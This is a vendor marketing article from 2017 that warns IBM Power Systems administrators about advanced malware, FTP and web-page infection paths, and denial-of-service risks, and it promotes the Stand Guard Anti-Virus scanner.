Article

Advanced Malware and Your Power Systems Server

IBM i
Posted:
March 9, 2017

 

There are many different types of malware including advanced persistent threats (APT), bots, worms, trojans, and viruses. While these traditional types of malware are menacing, the recent—and most advanced—threats are the ones to worry about.

Advanced malware is new, hard to detect, intended to be criminal (as opposed to a nuisance), and you probably only find out about it after the attack has succeeded. This is in contrast to traditional attacks that are “known” and can be blocked from the start. Though still important and needed, traditional defenses are unlikely to block these new threats well. Additional protection is needed.

Another characteristic of advanced malware is a zero-day approach or targeted nature. Because they are not yet broad-spread, there are usually no signatures for them, so your organization is likely to receive the first and only attack from the malware.

The threat landscape is constantly changing. Therefore, the rules (and necessity) for incorporating your IBM Power Systems server into your corporate malware guidelines have changed, too. If you use IBM Power Systems as a file server, your strategy must evolve! Enterprises must enhance their vigilance to protect themselves from advanced malware.

Yet still, many administrators do not see their IBM servers as being at risk. They have a very traditional view of a virus executing on a specific operating system. Maybe it’s true that the majority of malware exploits flaws in Microsoft Windows, but it would be silly for you to believe that only a Windows-based PC can be harmed. A virus doesn’t need to target a specific operating system in order to wreak havoc on your operations.

If a Windows-based PC is infected and it has a connection to your Power server, then the malware can perform any action if the infected PC has the authority to do so. This means that files on your IBM servers can be deleted, settings can be changed, objects can be modified, and even the server itself can be shut down.

Consider denial-of-service (DoS) attacks. These occur when a virus or malicious program running on an infected host overwhelms Power Systems services like FTP, DNS, or Telnet. IBM has documented several APARs that deal with DoS attacks. Viruses have been known to take down the Telnet sever. This would have a very serious effect on an IBM i server. No one would be signing on at that point.

Let’s look at a very common source of infection for IBM Power Systems: the FTP server. It’s built into Power and most of you are using it in some way (for administrative purposes or to share files with business partners or customers). Unfortunately, the FTP server will gladly allow infected files to be uploaded and downloaded. From a PC, the PUT command executed in a DOS prompt allows a file to be copied, regardless of its content, to any available directory on Power Systems. Another vulnerability of FTP is users saving files to the system using the Save As option in their software applications. Once an FTP location is defined within an application, no subsequent logon is required, creating a potentially dangerous situation. Any virus sitting on that PC can take advantage of this connection.

Recent malware trends show most attacks are browser-based. Web pages are a common place where threats can hide and spread to the PC of anyone who views those pages. Viruses can alter code in the HTML files to redirect a visitor to a different page—the page of the hacker’s choosing. They can also insert ActiveX code that will run code on a user’s computer. Viruses have even modified jpeg files to exploit vulnerabilities in Internet Explorer. But the net effect is this: if you have an infected web page that you are serving on Power, and that page is viewed by a customer, by a business partner, or internally, those PCs can become infected, too.

There are so many ways to receive malware, and closing off your Power server to incoming web traffic will not protect you. Other ways to get infections include:

  • Someone inside the firewall downloads something from the internet
  • CDs, DVDs, floppy disks, USB drives, and other removable media
  • Laptops or wireless devices
  • Email
  • VPNs
  • File sharing

All of these are possible avenues to be exploited, so you must protect against malware on the Power Systems server. Luckily, you can take immediate action and implement a native anti-virus software package on your Power server to scan your directories for viruses. Stand Guard Anti-Virus allows you to take advantage of the IBM-supported on-access scanning to prevent the virus from spreading. Try it free today!

 

Get Started

Scan Your IBM i, AIX, and Linux servers. Avoid an epidemic with a free virus scan today.

Related Solutions